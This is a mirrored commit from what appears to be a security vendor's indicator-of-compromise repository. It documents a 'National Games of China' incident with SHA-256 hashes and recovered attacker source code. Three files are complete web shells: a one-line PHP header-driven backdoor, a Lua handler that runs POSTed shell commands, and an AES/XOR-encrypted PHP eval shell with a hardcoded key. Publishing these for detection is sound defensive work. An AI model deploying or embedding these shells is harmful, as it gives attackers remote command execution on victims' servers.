mirror of
https://github.com/avast/ioc
synced 2024-06-16 11:58:39 +00:00
National Games of China
This commit is contained in:
parent
3657eda5b8
commit
477a48f73d
Binary file not shown.
26
NationalGamesOfChina/README.md
Normal file
26
NationalGamesOfChina/README.md
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
# IoC for National Games of China incident
|
||||||
|
|
||||||
|
### Table of Contents
|
||||||
|
* [IoCs](#IoCs)
|
||||||
|
* [Source Code](#event-names)
|
||||||
|
|
||||||
|
## Samples (SHA-256)
|
||||||
|
#### National Games of China incident related files
|
||||||
|
```
|
||||||
|
0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
|
||||||
|
0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
|
||||||
|
CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
|
||||||
|
0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
|
||||||
|
DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
|
||||||
|
BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
|
||||||
|
3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
|
||||||
|
EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
|
||||||
|
2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
|
||||||
|
D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
|
||||||
|
```
|
||||||
|
## Source Code files
|
||||||
|
```
|
||||||
|
admin2.php
|
||||||
|
conf.lua
|
||||||
|
miss1.php
|
||||||
|
```
|
1
NationalGamesOfChina/admin2.php
Normal file
1
NationalGamesOfChina/admin2.php
Normal file
@ -0,0 +1 @@
|
|||||||
|
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);?>
|
24
NationalGamesOfChina/conf.lua
Normal file
24
NationalGamesOfChina/conf.lua
Normal file
@ -0,0 +1,24 @@
|
|||||||
|
package.path = package.path .. ';../app/lua/?.lua;./app/lua/?.lua'
|
||||||
|
web = require "libs/webutils"
|
||||||
|
|
||||||
|
|
||||||
|
local handler = {}
|
||||||
|
|
||||||
|
function handler.cc(self, action)
|
||||||
|
local a = io.popen(mg.base64_decode(mg.base64_decode(web:post("username")))):read("*all")
|
||||||
|
--print(a)
|
||||||
|
web:plain(mg.base64_encode(mg.base64_encode(a)))
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--- The main loop
|
||||||
|
local a = web:get("a")
|
||||||
|
if handler[a] then
|
||||||
|
local result, err = pcall(handler[a], heandler, a)
|
||||||
|
if result == false then
|
||||||
|
web:json(json.encode({cmd='error', op='error', code=500, result=result, errmsg=err}))
|
||||||
|
end
|
||||||
|
else
|
||||||
|
web:html("hello test!");
|
||||||
|
end
|
26
NationalGamesOfChina/miss1.php
Normal file
26
NationalGamesOfChina/miss1.php
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
<?php
|
||||||
|
@error_reporting(0);
|
||||||
|
session_start();
|
||||||
|
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
|
||||||
|
$_SESSION['k']=$key;
|
||||||
|
session_write_close();
|
||||||
|
$post=file_get_contents("php://input");
|
||||||
|
if(!extension_loaded('openssl'))
|
||||||
|
{
|
||||||
|
$t="base64_"."decode";
|
||||||
|
$post=$t($post."");
|
||||||
|
|
||||||
|
for($i=0;$i<strlen($post);$i++) {
|
||||||
|
$post[$i] = $post[$i]^$key[$i+1&15];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$post=openssl_decrypt($post, "AES128", $key);
|
||||||
|
}
|
||||||
|
$arr=explode('|',$post);
|
||||||
|
$func=$arr[0];
|
||||||
|
$params=$arr[1];
|
||||||
|
class C{public function __invoke($p) {eval($p."");}}
|
||||||
|
@call_user_func(new C(),$params);
|
||||||
|
?>
|
10
NationalGamesOfChina/samples.sha256
Normal file
10
NationalGamesOfChina/samples.sha256
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
|
||||||
|
0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
|
||||||
|
CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
|
||||||
|
0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
|
||||||
|
DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
|
||||||
|
BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
|
||||||
|
3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
|
||||||
|
EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
|
||||||
|
2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
|
||||||
|
D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
|
Loading…
Reference in New Issue
Block a user